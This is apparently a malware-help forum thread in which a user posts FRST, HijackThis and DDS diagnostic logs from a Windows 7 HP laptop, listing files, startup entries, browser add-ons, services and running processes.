2014-05-21 07:21 - 2013-08-14 18:28 - 00003246 _____ () C:\Windows\System32\Tasks\HPCeeScheduleForHewlett Packard
2014-05-21 07:21 - 2013-06-05 07:48 - 00000000 _____ () C:\Windows\system32\HP_ActiveX_Patch_NOT_DETECTED.txt
2014-05-21 07:21 - 2013-05-08 11:19 - 00000052 _____ () C:\Windows\SysWOW64\DOErrors.log
2014-05-20 23:56 - 2013-11-03 11:23 - 00000000 ____D () C:\ProgramData\YTD Video Downloader
2014-05-20 09:28 - 2014-04-29 10:29 - 00003662 _____ () C:\Windows\System32\Tasks\DTChk
2014-05-20 09:28 - 2014-04-29 10:29 - 00000000 ____D () C:\Users\Public\Util
2014-05-20 00:56 - 2013-12-30 05:17 - 00000000 ____D () C:\Users\Hewlett Packard\Desktop\Personal 2014
2014-05-17 07:15 - 2013-05-07 15:41 - 00000000 ___RD () C:\Users\Hewlett Packard\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
2014-05-17 07:15 - 2013-05-07 15:41 - 00000000 ___RD () C:\Users\Hewlett Packard\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools
2014-05-17 03:31 - 2014-05-07 09:22 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-05-17 03:15 - 2013-05-13 14:23 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-05-17 03:07 - 2013-08-14 18:03 - 00000000 ____D () C:\Windows\system32\MRT
2014-05-17 03:03 - 2013-05-08 11:23 - 93223848 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-05-16 23:20 - 2014-05-16 23:20 - 00000000 ____D () C:\Windows\System32\Tasks\Norton Internet Security
2014-05-16 23:18 - 2014-01-17 11:42 - 00002019 _____ () C:\Users\Public\Desktop\Adobe Reader X.lnk
2014-05-16 23:18 - 2011-11-10 08:07 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader X.lnk
2014-05-16 23:15 - 2013-11-25 12:17 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Norton Internet Security
2014-05-16 23:15 - 2013-05-07 15:41 - 00002501 _____ () C:\Users\Public\Desktop\Norton Internet Security.lnk
2014-05-16 23:15 - 2012-04-06 01:53 - 00003234 _____ () C:\Windows\System32\Tasks\Norton WSC Integration
2014-05-16 23:15 - 2012-04-06 01:53 - 00000000 ____D () C:\Windows\system32\Drivers\NISx64
2014-05-16 11:36 - 2013-06-04 13:35 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
2014-05-11 11:36 - 2013-11-25 12:31 - 00003912 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-05-11 11:36 - 2013-11-25 12:31 - 00003660 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-05-09 15:35 - 2014-05-09 15:35 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Oracle
2014-05-09 15:35 - 2014-05-09 15:35 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2014-05-09 15:35 - 2013-10-22 10:14 - 00000000 ____D () C:\ProgramData\Oracle
2014-05-09 15:35 - 2013-09-05 18:21 - 00000000 ____D () C:\Program Files (x86)\Java
2014-05-09 14:14 - 2014-05-15 15:04 - 00477184 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-05-09 14:11 - 2014-05-15 15:04 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-05-07 22:56 - 2013-10-09 17:56 - 00000000 ____D () C:\Users\Hewlett Packard\Desktop\Aeden
2014-05-07 09:22 - 2014-05-07 09:22 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\DropboxMaster
2014-05-06 12:40 - 2014-05-17 03:14 - 23544320 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-05-06 12:17 - 2014-05-17 03:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-05-06 11:25 - 2014-05-17 03:14 - 17382912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-05-06 11:07 - 2014-05-17 03:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-05-06 11:00 - 2014-05-17 03:14 - 00084992 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-05-06 10:10 - 2014-05-17 03:14 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-05-05 16:55 - 2014-05-05 16:55 - 00000031 _____ () C:\Users\Hewlett Packard\Desktop\dvr password.txt
2014-05-05 16:52 - 2014-05-05 16:50 - 00000000 ____D () C:\Program Files (x86)\DVRClient Plug-in
2014-05-05 16:50 - 2014-05-05 16:50 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DVRClient Plug-in
2014-04-30 14:34 - 2014-04-30 14:34 - 00000000 ____D () C:\Users\Hewlett Packard\Desktop\Shinryo - MTR

Some content of TEMP:
====================
C:\Users\Hewlett Packard\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpb_ynzg.dll

==================== Bamital & volsnap Check =================

C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit

LastRegBack: 2014-05-19 10:35

==================== End Of Log ============================


----------



## raphael100 (May 24, 2014)

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 6:05:22 PM, on 5/27/2014
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v11.0 (11.00.9600.17041)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\HP SimplePass 2012\TouchControl.exe
C:\Program Files (x86)\HP SimplePass 2012\BioMonitor.exe
C:\Program Files (x86)\Hightail Desktop App\Hightail.exe
C:\Program Files (x86)\Skype\Phone\Skype.exe
C:\Users\Hewlett Packard\AppData\Roaming\Dropbox\bin\Dropbox.exe
C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe
C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe
C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe
C:\Program Files (x86)\SMART BRO\UIExec.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe
C:\Windows\SysWOW64\RunDll32.exe
C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe
C:\Program Files\WIDCOMM\Bluetooth Software\Bluetooth Headset Helper.exe
C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE
C:\Windows\sysWow64\SearchProtocolHost.exe
C:\Program Files (x86)\Yahoo!\Messenger\ymsgr_tray.exe
C:\Users\Hewlett Packard\AppData\Local\Apps\2.0\6H4TABEW.PPE\YHKT4HWK.R2D\vpno..tion_56181aa6c611862f_0002.0003_9bcc0731d8f9f012\VpnOneClick.exe
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Users\Hewlett Packard\Desktop\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.google.co.uk/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/p/?LinkId=255141
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/p/?LinkId=255141
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = 
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = 
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = 
O2 - BHO: Norton Identity Protection - {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\coIEPlg.dll
O2 - BHO: Norton Vulnerability Protection - {6D53EC84-6AAE-4787-AEEE-F4628F01010C} - C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\IPS\IPSBHO.DLL
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll
O2 - BHO: TSBHO Class - {8590886E-EC8C-43C1-A32C-E4C2B0B6395B} - C:\Program Files (x86)\HP SimplePass 2012\IEBHO.dll
O2 - BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: (no name) - {9e28b297-11d4-4293-aa6f-558658ee66ae} - (no file)
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll
O2 - BHO: SkypeIEPluginBHO - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O2 - BHO: URLRedirectionBHO - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\PROGRA~2\MICROS~1\Office14\URLREDIR.DLL
O2 - BHO: (no name) - {cc28794a-99d4-4b1b-bccf-b065ce5f9feb} - (no file)
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll
O2 - BHO: HP Network Check Helper - {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll
O3 - Toolbar: Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\coIEPlg.dll
O3 - Toolbar: (no name) - {665cb5b7-4c3b-4995-8cec-1f4d5860edc9} - (no file)
O3 - Toolbar: Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [HPOSD] C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe
O4 - HKLM\..\Run: [HP CoolSense] C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe -byrunkey
O4 - HKLM\..\Run: [FLxHCIm64] "C:\Program Files\Fresco Logic\Fresco Logic USB3.0 Host Controller\amd64_host\FLxHCIm.exe"
O4 - HKLM\..\Run: [HP Quick Launch] C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe
O4 - HKLM\..\Run: [UIExec] "C:\Program Files (x86)\SMART BRO\UIExec.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
O4 - HKLM\..\Run: [KiesTrayAgent] C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe
O4 - HKLM\..\Run: [Buffalo RUNONCE] C:\BUFFALO\DriveNavi_HD-PUSU3-WR\%SRC_FILE1% /mode:RUNONCE1
O4 - HKCU\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
O4 - HKCU\..\Run: [Skype] "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
O4 - HKCU\..\Run: [Messenger (Yahoo!)] "C:\PROGRA~2\Yahoo!\Messenger\YahooMessenger.exe" -quiet
O4 - Startup: Dropbox.lnk = Hewlett Packard\AppData\Roaming\Dropbox\bin\Dropbox.exe
O4 - Global Startup: Bluetooth.lnk = ?
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~2\MICROS~1\Office14\EXCEL.EXE/3000
O8 - Extra context menu item: Se&nd to OneNote - res://C:\PROGRA~2\MICROS~1\Office14\ONBttnIE.dll/105
O8 - Extra context menu item: Send image to &Bluetooth Device... - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
O8 - Extra context menu item: Send page to &Bluetooth Device... - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
O9 - Extra button: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1004 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra 'Tools' menuitem: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1003 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra button: @C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll,-103 - {25510184-5A38-4A99-B273-DCA8EEF6CD08} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\NCLauncherFromIE.exe
O9 - Extra 'Tools' menuitem: @C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll,-102 - {25510184-5A38-4A99-B273-DCA8EEF6CD08} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\NCLauncherFromIE.exe
O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: Se&nd to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
O9 - Extra button: OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
O9 - Extra 'Tools' menuitem: OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
O9 - Extra button: Skype Click to Call - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O9 - Extra button: @C:\Program Files (x86)\Evernote\Evernote\Resource.dll,-101 - {A95fe080-8f5d-11d2-a20b-00aa003c157a} - res://C:\Program Files (x86)\Evernote\Evernote\EvernoteIE.dll/204 (file missing)
O9 - Extra 'Tools' menuitem: @C:\Program Files (x86)\Evernote\Evernote\Resource.dll,-101 - {A95fe080-8f5d-11d2-a20b-00aa003c157a} - res://C:\Program Files (x86)\Evernote\Evernote\EvernoteIE.dll/204 (file missing)
O9 - Extra button: Send To Bluetooth - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
O9 - Extra 'Tools' menuitem: Send to &Bluetooth Device... - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O17 - HKLM\System\CCS\Services\Tcpip\..\{CA672D26-BFD4-4F50-B6AA-5D51B350F8A1}: NameServer = 8.8.8.8 8.8.4.4
O18 - Protocol: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\SKYPE4~1.DLL
O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
O18 - Filter hijack: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation. - C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: TrueSuiteService (FPLService) - HP - C:\Program Files (x86)\HP SimplePass 2012\TrueSuiteService.exe
O23 - Service: GamesAppService - WildTangent, Inc. - C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe
O23 - Service: Google Update Service (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update Service (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Software Updater (gusvc) - Google - C:\Program Files (x86)\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: HP Support Assistant Service - Hewlett-Packard Company - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe
O23 - Service: HP Client Services (HPClientSvc) - Hewlett-Packard Company - C:\Program Files\Hewlett-Packard\HP Client Services\HPClientServices.exe
O23 - Service: HP Software Framework Service (hpqwmiex) - Hewlett-Packard Company - C:\Program Files (x86)\Hewlett-Packard\Shared\hpqWmiEx.exe
O23 - Service: HPWMISVC - Hewlett-Packard Development Company, L.P. - C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
O23 - Service: Intel(R) Rapid Storage Technology (IAStorDataMgrSvc) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
O23 - Service: IconMan_R - Realsil Microelectronics Inc. - C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\Windows\system32\IEEtwCollector.exe (file missing)
O23 - Service: Intel(R) Rapid Start Technology Service (irstrtsv) - Intel Corporation - C:\Windows\SysWOW64\irstrtsv.exe
O23 - Service: Intel(R) Identity Protection Technology Host Interface Service (jhi_service) - Intel Corporation - C:\Program Files (x86)\Intel\Services\IPT\jhi_service.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Intel(R) Management and Security Application Local Management Service (LMS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
O23 - Service: Norton Management (MCLIENT) - Symantec Corporation - C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\ccSvcHst.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Norton Internet Security (NIS) - Symantec Corporation - C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\NIS.exe
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\stlang64.dll,-10101 (STacSV) - IDT, Inc. - C:\Program Files\IDT\WDM\STacSV64.exe
O23 - Service: UI Assistant Service - Unknown owner - C:\Program Files (x86)\SMART BRO\AssistantServices.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: Intel(R) Management and Security Application User Notification Service (UNS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\Wat\WatUX.exe,-601 (WatAdminSvc) - Unknown owner - C:\Windows\system32\Wat\WatAdminSvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)
O23 - Service: Yahoo! Updater (YahooAUService) - Yahoo! Inc. - C:\Program Files (x86)\Yahoo!\SoftwareUpdate\YahooAUService.exe

--
End of file - 16139 bytes


----------



## raphael100 (May 24, 2014)

DDS (Ver_2012-11-20.01) - NTFS_AMD64 
Internet Explorer: 11.0.9600.17041 BrowserJavaVersion: 10.55.2
Run by Hewlett Packard at 18:13:44 on 2014-05-27
Microsoft Windows 7 Home Premium 6.1.7601.1.1252.63.1033.18.4041.1454 [GMT 8:00]
.
AV: Norton Internet Security *Enabled/Updated* {D87FA2C0-F526-77B1-D6EC-0EDF3936CEDB}
SP: Norton Internet Security *Enabled/Updated* {631E4324-D31C-783F-EC5C-35AD42B18466}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Norton Internet Security *Enabled* {E04423E5-BF49-76E9-FDB3-A7EAC7E589A0}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Program Files (x86)\HP SimplePass 2012\TrueSuiteService.exe
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Program Files\IDT\WDM\STacSV64.exe
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\WLANExt.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
C:\Program Files\Hewlett-Packard\HP Client Services\HPClientServices.exe
C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
C:\Windows\SysWOW64\irstrtsv.exe
C:\Program Files (x86)\Intel\Services\IPT\jhi_service.exe
C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\ccSvcHst.exe
C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Program Files (x86)\SMART BRO\AssistantServices.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files (x86)\Yahoo!\SoftwareUpdate\YahooAUService.exe
C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Program Files (x86)\Common Files\Microsoft Shared\Virtualization Handler\CVHSVC.EXE
C:\Windows\system32\svchost.exe -k bthsvcs
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\system32\taskhost.exe
C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\ccSvcHst.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files (x86)\HP SimplePass 2012\TouchControl.exe
C:\Program Files (x86)\HP SimplePass 2012\BioMonitor.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\System32\hkcmd.exe
C:\Windows\System32\igfxpers.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\IDT\WDM\sttray64.exe
C:\Program Files (x86)\Hightail Desktop App\Hightail.exe
C:\Program Files\Hewlett-Packard\HP LaunchBox\HPTaskBar1.exe
C:\Program Files\Hewlett-Packard\HP LaunchBox\HPTaskBar2.exe
C:\Program Files (x86)\Skype\Phone\Skype.exe
C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
C:\Users\Hewlett Packard\AppData\Roaming\Dropbox\bin\Dropbox.exe
C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe
C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe
C:\Program Files\Fresco Logic\Fresco Logic USB3.0 Host Controller\amd64_host\FLxHCIm.exe
C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe
C:\Program Files (x86)\SMART BRO\UIExec.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe
C:\Program Files (x86)\Hewlett-Packard\Shared\hpqWmiEx.exe
C:\PROGRAM FILES\SYNAPTICS\SYNTP\SYNTPHELPER.EXE
C:\Program Files\CCleaner\CCleaner64.exe
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\SearchIndexer.exe
C:\Windows\SysWOW64\RunDll32.exe
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
C:\Windows\system32\taskeng.exe
C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\NIS.exe
C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\NIS.exe
C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe
C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
